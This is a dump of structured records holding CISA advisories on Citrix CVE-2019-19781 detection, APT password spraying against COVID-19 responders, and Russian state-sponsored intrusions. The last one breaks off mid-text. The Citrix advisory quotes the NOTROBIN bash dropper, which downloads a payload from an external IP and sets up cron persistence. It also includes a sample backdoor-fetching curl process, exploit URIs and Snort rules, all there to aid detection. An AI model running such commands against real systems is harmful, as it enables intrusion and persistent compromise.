Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[5] GitHub. BishopFox / pwn-pulse. ](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" )\n\n[[6] File disclosure in Pulse Secure SSL VPN (Metasploit) ](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \\(Metasploit\\)\" )\n\n[[7] Twitter. @alyssa_herra ](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"OpenSecurity Forums\" )\n\n[[10] Twitter. @alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n### Revisions\n\nApril 16, 2020: Initial Version\n\nOctober 23, 2020: Revision\n\nSeptember 05, 2023: Revision\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-107A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:47:17", "description": "### Summary\n\nUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nThough mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.\n\nCompromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.\n\nContact [CISA](<https://www.us-cert.gov/report>), or the [FBI](<https://www.fbi.gov/contact-us/field-offices/field-offices>) to report an intrusion or to request assistance.\n\n### Technical Details\n\n## Detection\n\nCISA has developed the following procedures for detecting a CVE-2019-19781 compromise. \n\n#### HTTP Access and Error Log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nThe impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in `/var/log`. Log files `httpaccess.log` and `httperror.log` should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.\n\n * `'*/../vpns/*'`\n * `'*/vpns/cfg/smb.conf'`\n * `'*/vpns/portal/scripts/newbm.pl*'`\n * `'*/vpns/portal/scripts/rmbm.pl*'`\n * `'*/vpns/portal/scripts/picktheme.pl*'`\n\nNote: These URIs were observed in Security Information and Event Management detection content provided by <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>.[[2]](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\nPer TrustedSec, a sign of successful exploitation would be a `POST` request to a URI containing `/../` or `/vpn`, followed by a GET request to an XML file. If any exploitation activity exists\u2014attempted or successful\u2014analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak\u2019s blog provided sample logs indicating what a successful attack would look like.[[3]](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n`10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] \"POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 200 143 \"https://10.1.1.2/\" \"USERAGENT \"`\n\n`10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] \"GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1\" 200 941 \"-\" \"USERAGENT\"`\n\nAdditionally, FireEye provided the following `grep` commands to assist with log review and help to identify suspicious activity.[[4]](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n`grep -iE 'POST.*\\.pl HTTP/1\\.1\\\" 200 ' /var/log/httpaccess.log -A 1`\n\n`grep -iE 'GET.*\\.xml HTTP/1\\.1\\\" 200' /var/log/httpaccess.log -B 1`\n\n#### Running Processes Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nReviewing the running processes on a system suspected of compromise for processes running under the `nobody `user can identify potential backdoors.\n\n`ps auxd | grep nobody`\n\nAnalysts should review the `ps` output for suspicious entries such as this:\n\n`nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `\u2013 sh -c uname &amp; curl -o \u2013 http://10.1.1.2/backdoor`\n\nFurther pivoting can be completed using the Process ID from the PS output:\n\n`lsof -p <pid>`\n\nDue to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the `httpd` process.\n\n### Checking for NOTROBIN Presence\n\n**Context: **Host Hunt\n\n**Type:** Methodology\n\n`pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k`\n\n`hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o`\n\n`/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * *`\n\n`/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd &\"`\n\nThe above is the NOTROBIN Bash exploit code. To check for NOTROBIN Presence, analysts should look for the staging directory at `/tmp/.init` as well as `httpd` processes running as a cron job.\n\nRunning the command `find / -name \".init\" 2> /tmp/error.log` should return the path to the created staging directory while taking all of the errors and creating a file located at `/tmp/error.log`.\n\n### Additional /var/log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAnalysts should focus on reviewing the following logs in `/var/log` on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the `nobody` user or `(null) on` and should try to identify any suspicious commands that may have been run, such as `whoami` or `curl`. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.\n\n**bash.log**\n\nSample Log Entry:\n\n`Jan 10 13:35:47`\n\n`<local7.notice> ns bash[63394]: nobody on /dev/pts/3`\n\n`shell_command=\"hostname\"`\n\nNote: The bash log can provide the user (`nobody`), command (`hostname`), and process id (`63394`) related to the nefarious activity.\n\n**sh.log**\n\n**notice.log**\n\n### Check Crontab for Persistence\n\n**Context:** Host Hunt\n\n**Type: **Methodology\n\nAs with running processes and log entries, any cron jobs created by the user `nobody` are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a `httpd` process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:\n\n`crontab -l -u nobody`\n\n### Existence of Unusual Files\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nOpen-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.\n\n * `/netscaler/portal/templates`\n * `/var/tmp/netscaler/portal/templates`\n\n### Snort Alerts\n\n**Context: **Network Alert\n\n**Type: **Signatures\n\nAlthough most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye\u2019s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .CONF response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7; content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; content:\"al]|0d0a|\"; distance:0; content:\"encrypt passwords\"; distance:0; content:\"name resolve order\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .PL response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7;`\n\n`content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; `\n\n`content:\"|0d0a|Connection: Keep-Alive\"; `\n\n`content:\"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6`\n\n`a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74`\n\n`2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534`\n\n`3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n### Suspicious Network Traffic\n\n**Context:** Network Hunt\n\n**Type: **Methodology\n\nFrom a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing `/../` or `/vpns/` to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful `POST` request followed by a successful `GET` request with the aforementioned characteristics.\n\nGiven that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).\n\n**Inbound Exploitation Activity (Suspicious URIs)**\n\n`index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml`\n\n**Outbound Traffic Search (Backdoor C2)**\n\n`index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>`\n\n`| stats count by src dest dest_port`\n\n`| sort -count`\n\nThe following resources provide additional detection measures.\n\n * Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[[6]](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) The tool aids customers with detecting potential IOCs based on known attacks and exploits.\n * The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[[7]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[8]](<https://github.com/cisagov/check-cve-2019-19781>)\n\n## Impact\n\nCVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n### Mitigations\n\nThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances.\n\n * Use Citrix's tool to check for the vulnerability. \n * <https://support.citrix.com/article/CTX269180>\n * Use an open-source utility to check for the vulnerability or previous device compromise. \n * <https://github.com/cisagov/check-cve-2019-19781>_ _\n * <https://github.com/x1sec/citrixmash_scanner>\n * <https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2>\n * Follow instructions from Citrix to mitigate the vulnerability. \n * <https://support.citrix.com/article/CTX267679>\n * <https://support.citrix.com/article/CTX267027>\n * Upgrade firmware to a patched version. \n * Subscribe to Citrix Alerts for firmware updates. \n * <https://support.citrix.com/user/alerts>\n * Patch devices to the most current version. \n * <https://www.citrix.com/downloads/citrix-gateway/>\n * <https://www.citrix.com/downloads/citrix-adc/>\n * <https://www.citrix.com/downloads/citrix-sd-wan/>\n\nConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.\n\nCISA's Tip [Handling Destructive Malware](<https://www.us-cert.gov/ncas/tips/ST13-003>) provides additional information, including best practices and incident response strategies.\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] GitHub web_citrix_cve_2019_19781_exploit.yml ](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\n[[3] TrustedSec blog: NetScaler Remote Code Execution Forensics](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n[[4] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[5] FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n[[6] IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>)\n\n[[7] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[8] CISA Vulnerability Test Tool](<https://github.com/cisagov/check-cve-2019-19781>)\n\n### Revisions\n\nJanuary 31, 2020: Initial Version|February 7, 2020: Added link to the Australian Cyber Security Centre script\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Detecting Citrix CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-05-21T12:00:00", "id": "AA20-031A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-031a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:42:14", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nCISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses. It describes some of the methods these actors are using to target organizations and provides mitigation advice.\n\nThe joint CISA-NCSC [Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors](<https://www.us-cert.gov/ncas/alerts/aa20-099a>) from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA\u2019s joint COVID-19 Alerts with NCSC, see the following [guide](<https://cisa.gov/sites/default/files/publications/Joint_CISA_UK_Tip-COVID-19_Cyber_Threat_Exploitation_S508C.pdf>).\n\n### COVID-19-related targeting\n\nAPT actors are actively targeting organizations involved in both national and international COVID-19 responses. These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.\n\nAPT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.\n\nThe pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy or acquire sensitive data on COVID-19-related research.\n\n### Targeting of pharmaceutical and research organizations\n\nCISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit. Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.\n\nThese organizations\u2019 global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.\n\nRecently CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[[1]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>),[[2]](<https://www.ncsc.gov.uk/news/citrix-alert>) and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[[3]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>),[[4]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### COVID-19-related password spraying activity\n\nCISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. These actors are using this type of attack to target healthcare entities in a number of countries\u2014including the United Kingdom and the United States\u2014as well as international healthcare organizations.\n\nPreviously, APT groups have used password spraying to target a range of organizations and companies across sectors\u2014including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.\n\n### Technical Details\n\n[Password spraying](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>) is a commonly used style of brute force attack in which the attacker tries a single and commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.\n\nMalicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. The actors will then \u201cspray\u201d the identified accounts with lists of commonly used passwords.\n\nOnce the malicious cyber actor compromises a single account, they will use it to access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.\n\nIn previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization\u2019s Global Address List (GAL). The actors then used the GAL to password spray further accounts.\n\nNCSC has previously provided [examples of frequently found passwords](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>), which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.\n\nCISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.\n\n### Mitigations\n\nCISA and NCSC have previously published information for organizations on password spraying and improving password policy. Putting this into practice will significantly reduce the chance of compromise from this kind of attack.\n\n * [CISA alert on password spraying attacks](<https://www.us-cert.gov/ncas/alerts/TA18-086A>)\n * [CISA guidance on choosing and protecting passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>)\n * [CISA guidance on supplementing passwords](<https://www.us-cert.gov/ncas/tips/ST05-012>)\n * [NCSC guidance on password spraying attacks](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>)\n * [NCSC guidance on password administration for system owners](<https://www.ncsc.gov.uk/collection/passwords>)\n * [NCSC guidance on password deny lists](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>)\n\nCISA\u2019s [Cyber Essentials](<https://www.cisa.gov/sites/default/files/publications/19_1106_cisa_CISA_Cyber_Essentials_S508C_0.pdf>) for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT professionals to put that culture into action. Additionally, the UK government\u2019s [Cyber Aware](<https://www.ncsc.gov.uk/cyberaware/home>) campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.\n\nA number of other mitigations will be of use in defending against the campaigns detailed in this report:\n\n * **Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and configurations. **See CISA\u2019s [guidance on enterprise VPN security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>) and NCSC [guidance on virtual private networks](<https://www.ncsc.gov.uk/collection/mobile-device-guidance/virtual-private-networks>) for more information.\n * **Use multi-factor authentication to reduce the impact of password compromises.** See the U.S. National Cybersecurity Awareness Month\u2019s [how-to guide for multi-factor authentication](<https://niccs.us-cert.gov/sites/default/files/documents/pdf/ncsam_howtoguidemfa_508.pdf?trackDocs=ncsam_howtoguidemfa_508.pdf>). Also see NCSC guidance on [multi-factor authentication services](<https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services>) and [setting up two factor authentication](<https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa>).\n * **Protect the management interfaces of your critical operational systems.** In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets. See [the NCSC blog on protecting management interfaces](<https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces>).\n * **Set up a security monitoring capability **so you are collecting the data that will be needed to analyze network intrusions. See the [NCSC introduction to logging security purposes](<https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes>).\n * **Review and refresh your incident management processes.** See [the NCSC guidance on incident management](<https://www.ncsc.gov.uk/guidance/10-steps-incident-management>).\n * **Use modern systems and software.** These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See [the NCSC guidance on obsolete platform security](<https://www.ncsc.gov.uk/guidance/obsolete-platforms-security>).\n * **Further information: **Invest in preventing malware-based attacks across various scenarios. See CISA\u2019s guidance on [ransomware](<https://www.us-cert.gov/Ransomware>) and [protecting against malicious code](<https://www.us-cert.gov/ncas/tips/ST18-271>). Also see [the NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>).\n\n### Contact Information\n\nCISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing [central@cisa.dhs.gov](<mailto:central@cisa.dhs.gov> \"Email CISA Central\" ).\n\nThe NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website: <https://report.ncsc.gov.uk/>.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[2] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[3] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[4] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### Revisions\n\nMay 5, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-25T12:00:00", "type": "ics", "title": "APT Groups Target Healthcare and Essential Services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-01-25T12:00:00", "id": "AA20-126A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-126a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:27:50", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/>) framework for all referenced threat actor tactics and techniques _\n\nThis joint cybersecurity advisory\u2014written by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)\u2014provides information on Russian state-sponsored advanced persistent threat (APT) actor activity targeting various U.S. state, local, territorial, and tribal (SLTT) government networks, as well as aviation networks. This advisory updates joint CISA-FBI cybersecurity advisory [AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>).\n\nSince at least September 2020, a Russian state-sponsored APT actor\u2014known variously as Berserk Bear, Energetic Bear, TeamSpy, Dragonfly, Havex, Crouching Yeti, and Koala in open-source reporting\u2014has conducted a campaign against a wide variety of U.S. targets. The Russian state-sponsored APT actor has targeted dozens of SLTT government and aviation networks, attempted intrusions at several SLTT organizations, successfully compromised network infrastructure, and as of October 1, 2020, exfiltrated data from at least two victim servers.\n\nThe Russian-sponsored APT actor is obtaining user and administrator credentials to establish initial access, enable lateral movement once inside the network, and locate high value assets in order to exfiltrate data. In at least one compromise, the APT actor laterally traversed an SLTT victim network and accessed documents related to:\n\n * Sensitive network configurations and passwords.\n * Standard operating procedures (SOP), such as enrolling in multi-factor authentication (MFA).\n * IT instructions, such as requesting password resets.\n * Vendors and purchasing information.\n * Printing access badges.\n\nTo date, the FBI and CISA have no information to indicate this APT actor has intentionally disrupted any aviation, education, elections, or government operations. However, the actor may be seeking access to obtain future disruption options, to influence U.S. policies and actions, or to delegitimize SLTT government entities.\n\nAs this recent malicious activity has been directed 